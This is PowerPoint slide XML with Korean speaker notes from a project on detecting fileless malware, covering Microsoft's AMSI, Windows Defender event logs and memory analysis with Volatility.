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67" r:id="rId2"/>
    <p:sldId id="256" r:id="rId3"/>
    <p:sldId id="274" r:id="rId4"/>
    <p:sldId id="272" r:id="rId5"/>
    <p:sldId id="275" r:id="rId6"/>
    <p:sldId id="335" r:id="rId7"/>
    <p:sldId id="287" r:id="rId8"/>
    <p:sldId id="324" r:id="rId9"/>
    <p:sldId id="286" r:id="rId10"/>
    <p:sldId id="321" r:id="rId11"/>
    <p:sldId id="323" r:id="rId12"/>
    <p:sldId id="322" r:id="rId13"/>
    <p:sldId id="320" r:id="rId14"/>
    <p:sldId id="319" r:id="rId15"/>
    <p:sldId id="293" r:id="rId16"/>
    <p:sldId id="327" r:id="rId17"/>
    <p:sldId id="334" r:id="rId18"/>
    <p:sldId id="314" r:id="rId19"/>
    <p:sldId id="315" r:id="rId20"/>
    <p:sldId id="317" r:id="rId21"/>
    <p:sldId id="333" r:id="rId22"/>
    <p:sldId id="336" r:id="rId23"/>
    <p:sldId id="311" r:id="rId24"/>
    <p:sldId id="307" r:id="rId25"/>
    <p:sldId id="295" r:id="rId26"/>
    <p:sldId id="298" r:id="rId27"/>
    <p:sldId id="301" r:id="rId28"/>
    <p:sldId id="302" r:id="rId29"/>
    <p:sldId id="300" r:id="rId30"/>
    <p:sldId id="305" r:id="rId31"/>
    <p:sldId id="325" r:id="rId32"/>
    <p:sldId id="306" r:id="rId33"/>
    <p:sldId id="331" r:id="rId34"/>
    <p:sldId id="328" r:id="rId35"/>
    <p:sldId id="291" r:id="rId36"/>
    <p:sldId id="330" r:id="rId37"/>
    <p:sldId id="332" r:id="rId38"/>
    <p:sldId id="266" r:id="rId3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97D"/>
    <a:srgbClr val="F3F3F3"/>
    <a:srgbClr val="1A3053"/>
    <a:srgbClr val="F94858"/>
    <a:srgbClr val="D9D9D9"/>
    <a:srgbClr val="A6A6A6"/>
    <a:srgbClr val="F03C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92" autoAdjust="0"/>
    <p:restoredTop sz="67483" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr>
      <p:cViewPr>
        <p:scale>
          <a:sx n="33" d="100"/>
          <a:sy n="33" d="100"/>
        </p:scale>
        <p:origin x="474" y="690"/>
      </p:cViewPr>
      <p:guideLst>
        <p:guide orient="horz" pos="2160"/>
        <p:guide pos="2880"/>
      </p:guideLst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-3108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C1C6D-9CDE-4139-8534-EB3D897825C7}" type="datetimeFigureOut">
              <a:rPr lang="ko-KR" altLang="en-US" smtClean="0"/>
              <a:t>2020-11-23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3A0505-0B28-492D-BC39-59B3CFFD7B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528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A0505-0B28-492D-BC39-59B3CFFD7BA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077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powershell.exe(2212, 2088)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이 또 다른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powershell.exe(3356, 2212)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를 실행시키는 행위를 볼 수 있었다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그래서 일단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powershell.exe(pid:3556)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이 어떠한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command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로 실행이 되는지 알아 내고자 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. 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또 추가적으로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powershell.exe(pid:3556)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가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로드하는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dll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들을 알아보고자 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. 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A0505-0B28-492D-BC39-59B3CFFD7BA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787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메모리를 스캔하여 악성스크립트 코드를 탐지</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>메모리가 아닌 메모리 버퍼라고 한 이유 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>= </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1"/>
              <a:t>msdn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>에서 굳이 메모리 버퍼라고 언급함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A0505-0B28-492D-BC39-59B3CFFD7BA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438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A0505-0B28-492D-BC39-59B3CFFD7BA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838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A0505-0B28-492D-BC39-59B3CFFD7BA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562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 변경 예정</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>배경 없는 것</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>+</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>색</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>)/ period</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>에 넣은 기간들 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>for</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>문으로 넣기 애매해서 저렇게 표현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A0505-0B28-492D-BC39-59B3CFFD7BA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3834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 변경 예정</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>배경 없는 것</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>+</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>색</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>)/ period</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>에 넣은 기간들 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>for</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>문으로 넣기 애매해서 저렇게 표현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A0505-0B28-492D-BC39-59B3CFFD7BA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1833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A0505-0B28-492D-BC39-59B3CFFD7BA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2327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A0505-0B28-492D-BC39-59B3CFFD7BA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2918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 변경 예정</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>배경 없는 것</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>+</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>색</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>)/ period</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>에 넣은 기간들 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>for</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>문으로 넣기 애매해서 저렇게 표현</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1"/>
              <a:t>kovert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A0505-0B28-492D-BC39-59B3CFFD7BA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975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 변경 예정</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>배경 없는 것</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>+</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>색</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>)/ period</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>에 넣은 기간들 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>for</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>문으로 넣기 애매해서 저렇게 표현</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1"/>
              <a:t>kovert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A0505-0B28-492D-BC39-59B3CFFD7BA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848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A0505-0B28-492D-BC39-59B3CFFD7BA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6300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 변경 예정</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>배경 없는 것</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>+</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>색</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>)/ period</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>에 넣은 기간들 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>for</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>문으로 넣기 애매해서 저렇게 표현</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1"/>
              <a:t>kovert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A0505-0B28-492D-BC39-59B3CFFD7BA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8579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A0505-0B28-492D-BC39-59B3CFFD7BA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5095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A0505-0B28-492D-BC39-59B3CFFD7BA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6686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응용 프로그램 제어를 우회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, Windows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의 허용 목록 또는 오 탐지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A0505-0B28-492D-BC39-59B3CFFD7BA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4406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A0505-0B28-492D-BC39-59B3CFFD7BA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1627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A0505-0B28-492D-BC39-59B3CFFD7BA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8272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A0505-0B28-492D-BC39-59B3CFFD7BA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0659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A0505-0B28-492D-BC39-59B3CFFD7BA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919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Other Application </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>의 입장으로 순서대로 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>Layer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>를 구성하여 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0" err="1"/>
              <a:t>디펜더</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t> 엔진과 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>RPC </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>통신을 통해 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>malware</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>의 스캔을 시도하였지만</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>실패</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/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로컬에 존재하는 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>MsMpEng.exe </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>와 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>MpEgine.dll, MpSvc.dll</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>과 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>RPC </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>통신이 이루어지지 않음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Microsoft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에서 제공하는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Sample AMSI C++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코드를 실행해봤다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처음 실행할 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프로그램이 동작하지 않았다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Readme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에 적힌 내용에 따라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Provider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설정을 해야 했고 레지스트리의 값을 샘플 값으로 변경하여 다시 실행하였다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레지스트리의 값을 설정하니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동작하는데 오류가 발생하지 않고 실행에 성공하였다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하지만 스캔하는 샘플 악성코드를 제대로 인식하지 못하고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malware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 아니라는 값의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을 반환하였다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하여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Sample AMSI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코드를 분석을 통해 엔진과 정상적으로 연결되지 않았다는 것을 추측 할 수 있었다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하여 직접 해당 엔진의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dll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RPC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통신을 시도했지만 통신이 이루어지지 않았다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indent="0">
              <a:buFontTx/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A0505-0B28-492D-BC39-59B3CFFD7BA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8661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AMSI </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>의 기본 엔진은 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>Windows Defender </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>이기때문에</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>, Windows 10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기본 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0" err="1"/>
              <a:t>프로그램들에서</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t> 실행된 이벤트 로그들을 가지고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r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>AMSI </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>구현에 실패 했지만</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>실시간 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1"/>
              <a:t>Widnows</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>Defender Event Log</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>를 보여주는 기능으로 대체하였다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A0505-0B28-492D-BC39-59B3CFFD7BA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692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A0505-0B28-492D-BC39-59B3CFFD7BA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7999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AMSI </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>의 기본 엔진은 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>Windows Defender </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>이기때문에</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>, Windows 10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기본 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0" err="1"/>
              <a:t>프로그램들에서</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t> 실행된 이벤트 로그들을 가지고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r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>AMSI </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>구현에 실패 했지만</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>실시간 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1"/>
              <a:t>Widnows</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>Defender Event Log</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>를 보여주는 기능으로 대체하였다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A0505-0B28-492D-BC39-59B3CFFD7BA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6063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AMSI </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>의 기본 엔진은 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>Windows Defender </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>이기때문에</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>, Windows 10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기본 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0" err="1"/>
              <a:t>프로그램들에서</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t> 실행된 이벤트 로그들을 가지고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r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>AMSI </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>구현에 실패 했지만</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>실시간 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1"/>
              <a:t>Widnows</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>Defender Event Log</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>를 보여주는 기능으로 대체하였다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A0505-0B28-492D-BC39-59B3CFFD7BA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8433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new </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>를 누르면 백그라운드에서 멀티프로세스로 동작함</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>- load memory analysis </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>하위메뉴에서 기존 결과를 불러오는데</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>, 2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>개가 동일한 이유는 동일한 덤프파일로 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0" err="1"/>
              <a:t>시연해봤기때문</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>가상환경에서 동작하는 시연영상은 따로 찍을 예정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A0505-0B28-492D-BC39-59B3CFFD7BA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6113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new </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>를 누르면 백그라운드에서 멀티프로세스로 동작함</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>- load memory analysis </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>하위메뉴에서 기존 결과를 불러오는데</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>, 2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>개가 동일한 이유는 동일한 덤프파일로 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0" err="1"/>
              <a:t>시연해봤기때문</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>가상환경에서 동작하는 시연영상은 따로 찍을 예정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A0505-0B28-492D-BC39-59B3CFFD7BA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8287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new </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>를 누르면 백그라운드에서 멀티프로세스로 동작함</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>- load memory analysis </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>하위메뉴에서 기존 결과를 불러오는데</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>, 2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>개가 동일한 이유는 동일한 덤프파일로 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0" err="1"/>
              <a:t>시연해봤기때문</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>가상환경에서 동작하는 시연영상은 따로 찍을 예정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A0505-0B28-492D-BC39-59B3CFFD7BA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8175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A0505-0B28-492D-BC39-59B3CFFD7BA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4047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A0505-0B28-492D-BC39-59B3CFFD7BA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949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 변경 예정</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>배경 없는 것</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>+</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>색</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>)/ period</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>에 넣은 기간들 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>for</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>문으로 넣기 애매해서 저렇게 표현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A0505-0B28-492D-BC39-59B3CFFD7BA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932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A0505-0B28-492D-BC39-59B3CFFD7BA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120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사용자가 사용하기에는 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Volatility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를 기반으로 만들어진 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="12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Rekall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보다는 불편하지만 사용자가 쉽게 접근하기에는 제일 쉽고 간편했기 때문에 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Volatility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로 진행을 하였다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 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진행을 함으로써 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Volatility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의 쉽고 용이한 플러그인 기능들을 이용하면서 메모리 분석을 원활하게 진행하였다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algn="l"/>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1200" dirty="0"/>
              <a:t>파일리스는 메모리상에서 실행되는 코드를 넣은 기법이기 때문입니다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파일리스 악성코드의 정의는 악의적인 기능을 수행하는 코드를 메모리상에서 실행시키면서 시스템에 피해를 입히는 유형의 공격을 뜻합니다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1200" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1200" dirty="0"/>
              <a:t>그렇다는 것은 메모리상에서 누구보다 적나라하게 나타난다고 생각이 들었고 다른 공격 기법들 역시 파일리스를 응용한다면 메모리상에서 보일 것이라고 판단되어 메모리 분석을 진행하게 되었습니다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1200" dirty="0"/>
              <a:t>,</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1200" dirty="0"/>
          </a:p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A0505-0B28-492D-BC39-59B3CFFD7BA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523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응용 프로그램 및 서비스를 컴퓨터에 있는 모든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Anti-Virus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제품과 통합 할 수 있는 다목적 인터페이스 표준으로 최종 사용자와 해당 데이터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애플리케이션 및 워크로드에 대해 향상된 보호 기능을 제공한다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또한 응용 프로그램에 통합할 수 있는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anti-malware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제품에서 제공하는 가장 일반적인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malware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검사 및 보호 기술을 허용하도록 설계되었다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파일 및 메모리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스트림 스캔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콘텐츠 소스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URL/IP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확인 및 기타 기술을 허용하는 호출 구조를 지원한다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AMSI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기능은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Windows 10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의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UAC, PowerShell, Windows Script Host, JavaScript and VBScript, Office VBA macros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프로그램에 통합되어 사용되고 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AMSI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는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Filelses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Malware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를 대응하도록 설계되었으며 활용할 수 있는 응용 프로그램 유형에는 스크립트 엔진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실행 전 메모리 버퍼를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스캔해야하는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응용 프로그램 및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PE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 아닌 실행 코드가 포함된 문서 파일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(MS word, Excel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매크로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PDF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문서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을 처리하는 응용 프로그램들이 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AMSI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는 응용 프로그램 내부에서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anti-malware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를 이용하려는 응용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로그램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개발자와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Third-part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제작자가 이를 주로 사용할 수 있게 설계했다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 보고서에서는 응용 프로그램 개발자 입장으로 접근할 것이다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en-US" altLang="ko-KR" dirty="0"/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~  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="12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파일리스의 특징과 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1200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관련지으면서</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="12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AMSI</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="12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를 사용하게 된 이유로 언급하면 좋을 듯 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~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200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Fileless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malware</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="12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는 런타임시 사용자의 메모리에 적재된 스크립트 코드가 실행되면서 사용자 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PC</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="12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에 침투하게 된다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.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파일리스  침투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)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Þ"/>
              <a:tabLst/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1200" dirty="0"/>
              <a:t>AMSI</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1200" dirty="0"/>
              <a:t>의 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1200" dirty="0"/>
              <a:t>‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="12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파일 및 메모리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스트림 스캔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콘텐츠 소스 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URL/IP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="12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확인 및 기타 기술을 허용하는 호출 구조를 지원</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1200" dirty="0"/>
              <a:t>‘ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1200" dirty="0" err="1"/>
              <a:t>기능를</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1200" dirty="0"/>
              <a:t> 통해서 메모리 버퍼를 스캔하여 악성스크립트 코드를 탐지 할 수 있기 때문에</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1200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Þ"/>
              <a:tabLst/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1200" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
